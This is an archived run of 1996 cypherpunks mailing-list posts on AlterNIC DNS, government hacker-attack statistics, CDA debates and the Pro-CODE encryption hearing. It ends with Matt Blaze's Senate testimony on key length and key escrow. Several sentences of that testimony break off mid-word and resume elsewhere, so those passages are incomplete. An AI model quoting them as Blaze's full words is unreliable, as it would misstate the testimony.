> only exists out of habit. 

Yes, lets have chaos so no one can send anyone else mail because no
two machines share the same idea of the global namespace. It will
reduce the number of messages like yours I have to read.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Thu, 27 Jun 1996 12:18:43 +0800
To: Clay Olbon II <Clay.Olbon@dynetics.com>
Subject: Re: CIA Fears UmpTeen InfoNukes
In-Reply-To: <ADF71F69-19B1582@193.239.225.200>
Message-ID: <Pine.3.89.9606261638.A9173-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On 26 Jun 1996, Clay Olbon II wrote:

> 
> Probably the same way other things are counted when used to make a
> political point (# of homeless people, # of date rape victims, etc.).  Make
> a wild-ass guess based on a very small sample, then multiply by a factor of
> 10 or 100.  I think lying with statistics has become a national pastime
> recently.  I tend to not trust numbers issued by folks who stand to gain
> from the use of the numbers.
> 
> 	Clay
> 

Lying with statistics probably started with the invention of the same. 
Mark Twain put it best:

"There are lies, damn lies, and statistics"

:-)

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young) (by way of Censored Girls Anonymous <carolann@censored.org>)
Date: Thu, 27 Jun 1996 10:34:58 +0800
To: cypherpunks@toad.com
Subject: Re: The Reno Text URL.....
Message-ID: <2.2.16.19960626212539.3e8f0c18@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Why, thank you very much for the kewl compliment. 
 
 
May I correct your correction of the URL for addres.txt: it should be "jya"
not "jwa," to read: 
 
 
    http://pwp.usa.pipeline.com/~jya/addres.txt 
 
 
Several c'punks have kindly noted my clumsy typing thumbs by breaking them.

 
 
Regards, 
 
 
Kohn






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arley Carter <ac@hawk.twinds.com>
Date: Thu, 27 Jun 1996 10:08:11 +0800
To: Alex de Joode <usura@replay.com>
Subject: Re: CIA Fears UmpTeen InfoNukes
In-Reply-To: <199606261549.RAA06484@basement.replay.com>
Message-ID: <Pine.HPP.3.91.960626162546.3893B-100000@hawk.twinds.com>
MIME-Version: 1.0
Content-Type: text/plain


Do that 100 times and become the top story on Dan Blather News.
"Today the FBI arrested Alex de Joode for trying to break into........" 
Billybob and Algore may even point you out as an example of "the criminal 
element that is running rampant on the Internet that we alone in 
Washington can protect America from."

How's *that* for 15 minutes of fame?  :-)

Cheers:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac@hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation or government agency>."

On Wed, 26 Jun 1996, Alex de Joode 
wrote:

> Mike  sez:
> [..]
> : By the way, there was a thing in the Yahoo/Reuters feed about "attacks"
> : on DoD computers; apparently British police arrested a "hacker" the
> : other day.  Anyway, the article included a claim that there have been
> : 250,000 attempted break-ins on DoD computers over the past year.
> 
> : Does anybody know how they count that?
> 
> 'telnet nsa.gov 25' and you will be added to the count .... 
> --
> 
> 	-AJ-
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Clay Olbon II" <Clay.Olbon@dynetics.com>
Date: Thu, 27 Jun 1996 10:42:06 +0800
To: "Mike McNally" <cypherpunks@toad.com
Subject: Re: CIA Fears UmpTeen InfoNukes
Message-ID: <ADF71F69-19B1582@193.239.225.200>
MIME-Version: 1.0
Content-Type: text/plain


Mike M Nally wrote:

>By the way, there was a thing in the Yahoo/Reuters feed about "attacks"
>on DoD computers; apparently British police arrested a "hacker" the
>other day.  Anyway, the article included a claim that there have been
>250,000 attempted break-ins on DoD computers over the past year.
>
>Does anybody know how they count
that?
>
>______c____________________________________________________________________
_
>Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
>       m5@tivoli.com * m101@io.com          *
>      <URL:http://www.io.com/~m101>         * suffering is optional
>

Probably the same way other things are counted when used to make a
political point (# of homeless people, # of date rape victims, etc.).  Make
a wild-ass guess based on a very small sample, then multiply by a factor of
10 or 100.  I think lying with statistics has become a national pastime
recently.  I tend to not trust numbers issued by folks who stand to gain
from the use of the numbers.

	Clay

***************************************************************************
Clay Olbon II       *      Clay.Olbon@dynetics.com
Systems Engineer    *    PGP262 public key on web page
Dynetics, Inc.      * http://www.msen.com/~olbon/olbon.html
***************************************************************** TANSTAAFL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Thu, 27 Jun 1996 10:55:29 +0800
To: m5@vail.tivoli.com (Mike McNally)
Subject: Re: CIA Fears UmpTeen InfoNukes
In-Reply-To: <31D13BF9.467A@vail.tivoli.com>
Message-ID: <199606262141.RAA03491@nrk.com>
MIME-Version: 1.0
Content-Type: text


> By the way, there was a thing in the Yahoo/Reuters feed about "attacks"
> on DoD computers; apparently British police arrested a "hacker" the
> other day.  Anyway, the article included a claim that there have been
> 250,000 attempted break-ins on DoD computers over the past year.
> 
> Does anybody know how they count that?

Pings & smtp verifies seem to be included in their counting.....


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Thu, 27 Jun 1996 05:32:10 +0800
To: cypherpunks@toad.com
Subject: Re: CIA Fears UmpTeen InfoNukes
Message-ID: <199606261549.RAA06484@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Mike  sez:
[..]
: By the way, there was a thing in the Yahoo/Reuters feed about "attacks"
: on DoD computers; apparently British police arrested a "hacker" the
: other day.  Anyway, the article included a claim that there have been
: 250,000 attempted break-ins on DoD computers over the past year.

: Does anybody know how they count that?

'telnet nsa.gov 25' and you will be added to the count .... 
--

	-AJ-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Thu, 27 Jun 1996 07:48:28 +0800
To: cypherpunks@toad.com
Subject: Re: Alternic.net (was domain zapping)
In-Reply-To: <2.2.32.19960626174302.0099dcf8@vertexgroup.com>
Message-ID: <19960626180225.9280.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


John F. Fricker writes:

 > DNS server administrators need only add one line to their named.boot file to
 > resolve .nic hosts.
 > 
 > secondary       nic     204.94.42.1             db.nic

Question to ponder: Why don't people encrypt mail sent to cypherpunks?

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software sells packet driver support     | PGP ok
521 Pleasant Valley Rd. | +1 315 268 1925 voice | Corporations persuade;
Potsdam, NY 13676       | +1 315 268 9201 FAX   | governments coerce.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lebkowsky <jonl@well.com>
Date: Thu, 27 Jun 1996 15:06:23 +0800
To: cypherpunks@toad.com
Subject: Bruce Taylor at HotWired
Message-ID: <199606270208.TAA29471@mh1.well.com>
MIME-Version: 1.0
Content-Type: text/plain


Attorney Lance Rose, originally scheduled for the HotWired Electronic
Frontiers Forum this Thursday night, June 27 (probably TODAY as you read
this...), could not make it, however in his place we've extended an
11th-hour invitation to Bruce Taylor of the National Law Center for Children
and Families, and he's accepted.  Please join us!

(Requires that you join HotWired)

javachat at http://talk.wired.com
or
telnet to talk.wired.com


--
Jon Lebkowsky <jonl@hotwired.com>                 http://www.well.com/~jonl
Electronic Frontiers Forum, 6PM PDT Thursdays  <http://www.hotwired.com/eff>  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Thu, 27 Jun 1996 12:50:43 +0800
To: Gary Howland <gary@systemics.com>
Subject: Re: Noise: Re: Those Evil Republicans
In-Reply-To: <31D104C6.62319AC4@systemics.com>
Message-ID: <9606262325.AA25647@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Jersey and the Isle of Man are not independent soverign nations. The
Manx parliament is subordinate to the English Privy Council and Jersey
is similarly an anachronism. Andora is ruled jointly by the French President
and a Spanish Bishop (or is it the other way round?).

Fogive my skepticism but I don't think that any ecconomist would seriously
suggest these as usefull models for modern industrial societies. The chief
industries being parasitic on those of larger nations.

There are political solutions to the problem of regulation being factored 
down to the lowest common denominator. That is the purpose of the Social
Chapter (nee charter) of the EU Maastricht agreement. The next round of
GATT is likely to contain similar requirements.

		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lile Elam <elam@art.net>
Date: Thu, 27 Jun 1996 15:36:07 +0800
To: jya@pipeline.com
Subject: Re:  CIA Fears UmpTeen InfoNukes
Message-ID: <199606270238.TAA25847@art.net>
MIME-Version: 1.0
Content-Type: text/plain


When I saw this article in the paper early this morning (like 1am)
on nando.net, I just couldn't beleave it....

When did hackers become a threat? I thought that hackers were a 
national resource! 

It sounds like these gov folks are concerned about how much
hackers know how things work... which is probably more than
they do. Didn't hackers build the Internet? :)

I just blew the article off as noise. I just can't waist 
energy on such rubbish.

-lile




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Thu, 27 Jun 1996 15:02:53 +0800
To: Jim McCoy <mccoy@communities.com>
Subject: Re: Alternic.net (was domain zapping)
In-Reply-To: <v02140b02adf75a42eda3@[205.162.51.35]>
Message-ID: <Pine.LNX.3.94.960626220042.157A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 26 Jun 1996, Jim McCoy wrote:

> John Fricker writes:
> 
> > DNS server administrators need only add one line to their named.boot file to
> > resolve .nic hosts.
> >
> > secondary       nic     204.94.42.1             db.nic
> >
> > It's that easy!
> 
> Sorry, but this only gives you domain name resolution for the .nic TLD, not
> the other new top-level domains they want to create or any domains that
> alternic is proposing to provide service for.  To do that one needs to add an
> appropriate line into the root.cache file (or whatever the root server list
> is in your name server setup), at which point you are also trusting alternic
> with pointing you properly to any domain they get queried on.

A better way is to add the nameserver data file distributed by alternic and
adding it to primary nameserver data.  The file that the alternic distributes
does not have any root level servers defined (except the ones distributed by
the Internic) so there isn't much trust involved.

> 
> > The concept of centralized name resolutions is flawed and
> > only exists out of habit.
> 
> It is not just about habit, it is also about trust.  There are alternatives,
> but they need to be thought-out much more than this alternic stuff...

I don't see trust as being much of a factor on the user-end.  The only people
that really need to trust alternic are the people who have domain names
registered with them.  If the alternic starts screwing with its nameserver
data, this will just cause them a severe loss of reputation without any gain.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMdHtXrZc+sv5siulAQE+vwP9GXJFC5YOpSgLCYW2hLklljC6IYJfyYSP
QZDBoDdPgWjVzgCIx8v2XEyTxd7GSoGZHVk8eYy8lqsKRGBVaXoAJhSGHu2RQnGv
5DW6kFE0/CcsDhYbgcqzoHSdNb67elT8Nei/bUanSXRIkBgXA2bC0VEF0/pGeGtW
Xd0zrZLtPnY=
=Xids
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Firebeard <stend@grendel.austin.texas.net>
Date: Thu, 27 Jun 1996 15:36:19 +0800
To: Philip Zimmermann <prz@ACM.ORG>
Subject: Re: Zimmermann's Senate testimony
In-Reply-To: <199606251539.PAA01255@maalox>
Message-ID: <199606270324.WAA04246@grendel.austin.texas.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


	Um, color me paranoid, but...  Has this been independently
verified that this _is_ Mr Zimmermann's testimony?  If there is
anyone's messages that I'm suspicious of if they are un-PGP-signed,
it's Mr Zimmermann's.

- -- 
#include <disclaimer.h>                               /* Sten Drescher */
ObCDABait:      For she doted upon their paramours, whose flesh is as the
flesh of asses, and whose issue is like the issue of horses.  [Eze 23:20]
Unsolicited solicitations will be proofread for a US$100/page fee.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQEVAwUBMdH+1S+2V9GxYWz1AQE7Cwf+MMLkXYqNiw94ywf3p7kHLQOOzmowKLSG
QntDXI7AL8go4jE9y6wHKMAwZSEb5BAMaJaHX1M2MRKpkfO0eIII5vfJ7bJmPwEx
/bAL9JVV6vxRRB/7yyN2tIR4Ot3Saurb6AJ2eCudz2k6zaGosEsgVxTUnWxx/6Ou
SCxhtCpNXwNJc6nHGgsOOR6wEV+hm/hzOn1h100VLXm7Rs/cBC15f9XPOYw06A6N
vmymtu26MLY0dPo7nU+s2JJK1WqdmKRyjPjL/3tF1tTCrk8ifE7Ov6G/z5Yhxb4X
E0SuBLU/vRVUYoTbgTiiB12vpWr3SVp+79eX+dtRE/HQOzfwxpoemA==
=ajuN
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Thu, 27 Jun 1996 15:06:17 +0800
To: cypherpunks@toad.com
Subject: Re: Bruce Taylor at HotWired
Message-ID: <v01510104adf7b1cd7bca@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


This is going to be an interesting chat. It will be the first time in my
recollection that a supporter of the CDA has ventured onto the Net to
defend it.

Taylor, of course, is the principal author of the CDA as the president of
the National Law Center for Children and Families. A former Justice
Department porn-prosecutor with a record number of convictions ("Comstock
was an amateur"), he'll be talking about what the DoJ is thinking and what
their plans are. (He's argued obscenity cases before the Supreme Court.)

But for such a net-basher, he's pretty cyberclueless. Since Taylor doesn't
even have email, let alone a live net-connection, he's coming over to my
office tomorrow evening and we'll connect to HotWired from my Macintosh.

"Hide your porn," he reminded me.

I plan to.

-Declan



Info on Taylor's CDA amicus brief supporting the Justice Department:
  http://fight-censorship.dementia.org/dl?num=2388

The text of Taylor's amicus brief:
 http://fight-censorship.dementia.org/dl?num=2736




>Attorney Lance Rose, originally scheduled for the HotWired Electronic
>Frontiers Forum this Thursday night, June 27 (probably TODAY as you read
>this...), could not make it, however in his place we've extended an
>11th-hour invitation to Bruce Taylor of the National Law Center for Children
>and Families, and he's accepted.  Please join us!
>
>(Requires that you join HotWired)
>
>javachat at http://talk.wired.com
>or
>telnet to talk.wired.com
>
>
>--
>Jon Lebkowsky <jonl@hotwired.com>                 http://www.well.com/~jonl
>Electronic Frontiers Forum, 6PM PDT Thursdays  <http://www.hotwired.com/eff>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: molecul1@molecule1.com (Molecule One Scientific Research Institute)
Date: Thu, 27 Jun 1996 17:12:49 +0800
To: cypherpunks@toad.com
Subject: this 1 seeking koool..................
Message-ID: <m0uZ9sh-0009WnC@powergrid.electriciti.com>
MIME-Version: 1.0
Content-Type: text/plain


Peace & tranquil wishes y'all,

   This 1 seeking koool, artistic, creative, farout webdesign person
in S.D. area. Creative 1's can e.................. 2 above email address.
Serious, creative, farout, artistic types only please. Gender no prob.
   Peace & super koool wishes.
                                                                            
               Keep koool,
                                                                            
                             M1.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Thu, 27 Jun 1996 16:16:52 +0800
To: Lile Elam <elam@art.net>
Subject: Re:  CIA Fears UmpTeen InfoNukes
Message-ID: <v01510108adf7b97d4a23@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


You should believe it. Take it seriously. Your elected Congressperns do.

In a nice twist, the threat of darkside hackers has emerged as one of the
best arguments for Sen. Burns' Pro-CODE legislation.

At today's hearing, it was clear that we needed the legislation to encrypt
the net-infrastructure and prevent it from being ripped apart by
terrorists. Security through strong crypto, I say, and paint Janet Reno as
a friend of and apologist for those evil hackers.

-Declan




>When I saw this article in the paper early this morning (like 1am)
>on nando.net, I just couldn't beleave it....
>
>When did hackers become a threat? I thought that hackers were a
>national resource!
>
>It sounds like these gov folks are concerned about how much
>hackers know how things work... which is probably more than
>they do. Didn't hackers build the Internet? :)
>
>I just blew the article off as noise. I just can't waist
>energy on such rubbish.
>
>-lile






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@hotwired.com (Declan McCullagh)
Date: Thu, 27 Jun 1996 16:07:17 +0800
To: cypherpunks@toad.com
Subject: HotWired: Crypto Switch in DC
Message-ID: <v0151010aadf7bb1cab7b@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


http://www.hotwired.com/netizen/

Crypto Switch?

By Brock N. Meeks
Washington, DC, 26 June 1996

   Advocates for the use of encryption free of government mandates
   packed a Senate hearing room to overflowing today in support of a
   pro-encryption bill. But as no detractors were asked to testify at the
   hearing, this was all preaching to the crypto choir.

   What even the preachers and choir are unaware of, however, is that a
   senior White House official is quietly trying to turn the
   administration away from its lock-step allegiance to the FBI and
   National Security Agency rhetoric of "strong crypto bad; key escrow
   good."

   This official told Dispatch: "I'm hoping to develop a [consensus
   movement] inside the administration that will stand up to some of the
   [law enforcement and intelligence agency] interests" on encryption.
   "We haven't found the right encryption policy yet," the official
   noted.

   Here, for the first time, there's real hope that the administration
   can be swayed from its wholesale support for the key-escrow encryption
   scheme. "The government moves on its own," the White House source
   said. There are "shifting sands on things ... policies change," and
   there's the "potential that the administration's position will change
   over time."

   So what we have, of course, is the classic Washington public-private
   squeeze play: Push an issue in public, and push even harder in
   private.

   Today, the Senate's newest wired member and the chairman of the Senate
   Science Subcommittee hearing, Conrad Burns (R-Montana), welcomed
   testimony from crypto experts in support of his previously introduced
   pro-encryption bill, the Commerce Online in the Digital Era Act of
   1996, dubbed "Pro-CODE." Burns called the hearing a historic event in
   that it was the first time a Senate hearing had been wired to the Net.

   Several senators knocked the White House for supporting encryption
   policies that essentially hogtie US businesses, locking them out of a
   lucrative international market. Others made reference to potential
   dangers of empowering government agencies, such as the FBI, with the
   ready ability to snoop on the private speech of citizens.

   Senator John Ashcroft (R-Missouri) noted how the "events of the this
   last week or two" - namely, the political flap resulting from the
   White House inspection of FBI background files - "brings into sharp
   focus" the need to assure Americans that their private speech won't be
   compromised. "I want to be sure we don't forfeit what it means to be
   an American citizen," Ashcroft said.

   Jerry Berman, executive director of the Center for Democracy and
   Technology, put a finer point on the issue: "We don't want the
   Internet to become the ultimate FBI background file on everyone."

   Although the panelists admitted that law enforcement has a legitimate
   concern about criminals being able to use encryption techniques to
   subvert investigations, they also noted that such concerns had to be
   balanced with constitutional rights.

   Marc Rotenberg, executive director for the Electronic Privacy
   Information Center, responding to a question about whether "secret
   speech" should be given the same protection as public speech, said
   that there's no doubt that encrypted speech should be awarded the same
   protection as public speech. However, Rotenburg cautioned, "the courts
   have to be educated first," as they were during the recent case in
   which the Communications Decency Act was deemed unconstitutional.

   And so went the show. No fireworks; then again, none were expected.

   And while the hearing finally allowed the pro-crypto camp a chance to
   spout off to Congress, it was really only a steppingstone to future
   efforts. The reason? Even the hard-core crypto advocates privately
   admit that this legislation doesn't have a prayer of passing, given a
   cramped legislative calendar and election-year rhetoric.

###






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Thu, 27 Jun 1996 15:50:57 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Fortezza now comes on an ISA card
Message-ID: <Pine.SUN.3.94.960626232821.25871B-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


http://www.rnbo.com/PROD/FORTEZZA_ISA.HTM

This may be old news, but it was new to me.

Note the "extra" features, including a new approach to "secure 
timestamping".

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Thu, 27 Jun 1996 19:08:24 +0800
To: cypherpunks@toad.com
Subject: Re: Grubor remailer? (Was Re: Lucifer remailer)
Message-ID: <199606270705.AAA23255@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


>Hm, is that Dr. John Grubor's domain (aga@dhp.com)?
>
>That will make a nice anonymous remailer... NOT! Thank you.

dhp is not "Grubor's domain," it's just a Pittsburgh ISP
with liberal terms of service (which is why it can run
remailers).    Perhaps you're thinking of "manus.org"?

check out http://www.dhp.com/amusement.html for some 
background on dhp's attitude

		-not a DHP user or sysadmin







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Thu, 27 Jun 1996 19:02:21 +0800
To: cypherpunks@toad.com
Subject: My testimony at Wednesday's Senate hearing on encryption policy
Message-ID: <199606270502.BAA19188@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


WRITTEN TESTIMONY OF DR. MATTHEW BLAZE

BEFORE THE SENATE COMMITTEE ON COMMERCE, SCIENCE, AND TRANSPORTATION,
SUBCOMMITTEE ON SCIENCE, TECHNOLOGY, AND SPACE

JUNE 26, 1996


Thank you for the opportunity to speak with you about the technical
impact of encryption policy.  It is a privilege to be here, and I
hope my perspective will be useful to you.

Let me begin by describing my own background and biases.  I am a
Principal Research Scientist in the area of computer security and
cryptology at AT&T Research in Murray Hill, New Jersey.  I also
hold a number of ancillary appointments related to computer security;
among others, I teach an occasional graduate course in the subject
at Columbia University, and I serve as co-chair of the Federal
Networking Council Advisory Committee subcommittee on security and
privacy (which advises Federal agencies on computer networking
issues).  However, the views I am presenting here today are my own,
and should not be taken to represent those of any organization with
which I happen to be affiliated.

I am a computer scientist by training; my Ph.D. is from the Princeton
University Computer Science department, and my primary research
areas are cryptology, computer security, and large-scale distributed
systems.  Much of my research focuses on the management of encryption
keys in networked computing systems and understanding the risks of
using cryptographic techniques to accomplish security objectives.
Recent government initiatives in encryption, such as the "Clipper
Chip," have naturally been of great interest to me, in no small
part because of the policy impact they have on the field in which
I work, but also because they present a number of very interesting
technical and scientific challenges in their own right.

My testimony today focuses on three areas.  First, I will discuss
the role and risks of cryptographic techniques for securing the
current and future electronic world.  Next, I will examine in more
detail the security implications of the limitations imposed on
US-based cryptographic systems through the government's export
policies.  Finally, I will discuss the technical aspects of the
Administration's current approach to cryptography policy, which
promotes "key escrow" systems.


I  THE INCREASING IMPORTANCE OF ENCRYPTION

The importance of cryptographic techniques for securing modern
computer and communications systems is widely recognized today.
Evidence of the scope of  this recognition can be found in the
increasing number of hardware, software, and system vendors that
offer encryption in their products, the increasing demand for
high-quality encryption by users in a widening array of applications,
and the growing, thriving community of cryptologic researchers of
which I am a part.  It is vital that those who formulate our nation's
policies and official attitude toward encryption understand the
nature of the underlying technology and the reasons for its growing
importance to our society.

The basic function of cryptography is to separate the security of
a message's content from the security of the medium over which it
is carried.  For example, we might encrypt a cellular telephone
conversation to guard against eavesdroppers (allowing the call to
be transmitted safely over easily-intercepted radio frequencies),
or we might use encryption to verify that documents, such as
contracts, have not been tampered with (removing the need to
safeguard a copy of the original).  The idea that this might be
possible is not a new one; history suggests that the desire to
protect information is almost as old as the written word itself.
Perhaps as a consequence of the invention of the digital computer,
our understanding of the theory and practice of cryptography has
accelerated in recent years, with a number of new techniques
developed and many new applications emerging.  Among the most
important of the recent techniques is "public key cryptography."
It allows secure messages to be exchanged without the need

Modern cryptographic techniques are based on the application of
simple, if repetitive,  mathematical functions, and as such lend
themselves nicely to implementation by computer programs.  Any
information that can be represented digitally can be protected by
encryption, including computer files, electronic mail messages,
and even audio and video signals such as telephone calls, radio,
and television.  Encryption can be performed by means of software
on general-purpose computers, through special-purpose hardware, or
by special programming of microprocessor-based electronic products
such as the next generation of cellular telephones.  The basic cost
of encryption in terms of computational power required is quite
low, and the marginal cost of including encryption in a software-based
computer program or a programmable electronic product is essentially
zero.

Why, then, has encryption recently enjoyed so much attention?  The
reasons can be found from two perspectives: the technology of modern
communication systems, and the new purposes for which we are relying
on digital information.

First, the technology and economics of modern communications and
computing systems strongly favors media that have little inherent
security.  For example, wireless telephones have great advantages
in convenience and functionality compared with their familiar wired
counterparts and are comprising an increasing proportion of the
telephone network.  This also makes eavesdropping much easier for
curious neighbors, burglars identifying potential targets, and
industrial spies seeking to misappropriate trade secrets.  Similarly,
decentralized computer networks such as the Internet have lower
barriers to entry, are much less expensive, are more robust and
can be used to accomplish a far greater variety of tasks than the
proprietary networks of the past, but, again, at the expense of
intrinsic security.  The Internet makes it virtually impossible to
restrict, or even predict, the path that a particular message will
traverse, and there is no way to be certain where a message really
originated or whether its content ha

Second, electronic communication is becoming increasingly critical
to the smooth functioning of our society and our economy and even
to protect the safety of human life.  Communication networks and
computer media are rapidly replacing less efficient, traditional
modes of interaction whose security properties are far better
understood.  As teleconferencing replaces face-to-face meetings,
electronic mail replaces letters, electronic payment systems replace
cash transactions, and on-line information services replace written
reference materials, we gain a great deal in efficiency, but our
assumptions about the reliability of very ordinary transactions
are often dangerously out-of-date.

Put another way, the trend in communication and computing networks
has been away from closed systems in favor of more open ones and
the trend in our society is to rely on these new systems for
increasingly serious purposes.  There is every reason to believe
that these trends will continue, and even accelerate, for the
foreseeable future.  Cryptography plays an important and clear role
in helping to provide security assurances that at least mirror what
we have come to expect from the older, more familiar communications
methods of the not-so-distant past.


II  KEY LENGTH AND SECURITY

The "strength" of an encryption system depends on a number of
variables, including the mathematical properties of the underlying
encryption function, the quality of the implementation, and the
number of different "keys" from which the user is able to choose.
It is very important that a cryptosystem and its implementation be
of high quality, since an error or bug in either can expose the
data it protects to unexpected vulnerabilities.  Although the
mathematics of cryptography is not completely understood and cipher
design is an exceptionally difficult discipline (there is as yet
no general "theory" for designing cipher functions), there are a
number of common cipher systems that have been extensively studied
and that are widely trusted as building blocks for secure systems.
The implementation of practical systems out of these building
blocks, too, is a subtle and difficult art, but commercial experience
in this area is beginning to lead to good practices for adding
high-quality encryption systems to software

The most easily quantified variable that contributes to the strength
of an encryption system is the size of the pool of potential values
from which the cryptographic keys are chosen.  Modern ciphers depend
on the secrecy of the users' keys, and a system is considered
well-designed only if the easiest "attack" involves trying every
possible key, one after the other, until the correct one is found.
The system is secure only if the number of keys is large enough to
make such an attack infeasible.  Keys are usually specified as a
string of "bits," and adding one bit to the key length doubles the
number of possible keys.  An important question, then, is the
minimum key length sufficient to resist a key search attack in
practice.

Last November, I participated in a study, organized by the Business
Software Alliance, aimed at examining the computer technology that
might be used by an "attacker" in order to determine the minimum
length keys that should be used in commercial applications.  We
followed an unusually conservative methodology in that we assumed
that the attacker would have only available standard "off-the-shelf"
technology and is constrained to purchase in single-unit quantities
with no economies of scale.  That is, our methodology would tend
to produce a recommendation for shorter keys than would an analysis
using the more conventional approach of giving the potential attacker
every benefit of the doubt in terms of technological advantages he
might enjoy.  Nonetheless, we concluded that the key lengths
recommended in existing U.S. government standards (e.g., the Data
Encryption Standard, with a 56-bit key) for domestic use are far
too short and will soon render data protected under them vulnerable
to attack with only modest

Attempting to design systems "at the margins" by using the minimum
key length needed is a dubious enterprise at best.  Because even
a slight miscalculation as to the technology and resources available
to the potential attacker can make the difference between a secure
system and an insecure one, prudent designers specify keys that
are longer than the minimum they estimate is needed to resist
attack, to provide a margin for error.

Current U.S. policy encourages the designers of encryption systems
to take exactly the opposite approach.  Encryption systems designed
for export from the United States at present generally must use
keys no more than 40 bits long.  Such systems provide essentially
no cryptographic security, except against the most casual "hacker."
Examples of 40 bit systems being "broken" through the use of spare
computer time on university computer networks are commonplace.
Unfortunately, it is not only users outside the U.S. who must make
do with the inferior security provided by such short keys.  Because
of the difficulty of maintaining  multiple versions of software,
one for domestic sale and one for export, and the need for common
interoperability standards, many US-based products are available
only with export-length keys.

There is no technical, performance, or economic benefit to employing
keys shorter than needed.  Unlike, for example, the locks used to
protect our homes, very secure cryptographic systems with long keys
are no more expensive to produce or any harder to design or use
than weaker systems with shorter keys.  The only reason vendors
design systems with short keys is to comply with export requirements.

The key length figures and analysis in this section are based on
so-called "secret key" cryptosystems.  For technical reasons,
current public key cryptosystems employ much longer keys than secret
key systems to achieve equivalent security (public keys are measured
in hundreds or thousands of bits).  However, virtually all systems
that use public key cryptography also rely on secret key cryptography,
and so the overall strength of any system is limited by the weakest
encryption function and key length in it.


III  THE RISKS OF KEY ESCROW

A number of recent Administration initiatives have proposed that
future cryptosystems include special "key escrow" provisions to
facilitate access to encrypted data by law enforcement and intelligence
agencies.  In a such systems, copies of keys are automatically
deposited, in advance, with third parties who can use them to
arrange for law enforcement access if required in the future.
Several key escrow systems have been proposed by the Administration,
differing in the details of how keys are escrowed, and who the
third party key holders are.  In the first proposal, called the
"Clipper chip," the system is embedded in a special tamper-resistant
hardware-based cryptosystem and copies of keys are held by federal
agencies.  In the more recent "public key infrastructure" proposal,
keys are escrowed at the time a new public key is generated and
are held by the organization (public or private) responsible for
certification of the public key.

Although the various key escrow proposals differ in the details of
how they accomplish their objective, there are a number of very
serious fundamental problems and risks associated with all of them.

There are some appropriate commercial applications of key escrow
techniques.  A properly designed cryptosystem makes it essentially
impossible to recover encrypted data without the correct key.  This
can be a double-edge sword; the cost of keeping unauthorized parties
out is that if keys are lost or unavailable at the time they are
needed, the owner of encrypted data will be unable to make use of
his own information.  This problem, of balancing  secrecy with
assurances of continued availability, remains an area of active
research, and commercial solutions are starting to emerge.  The
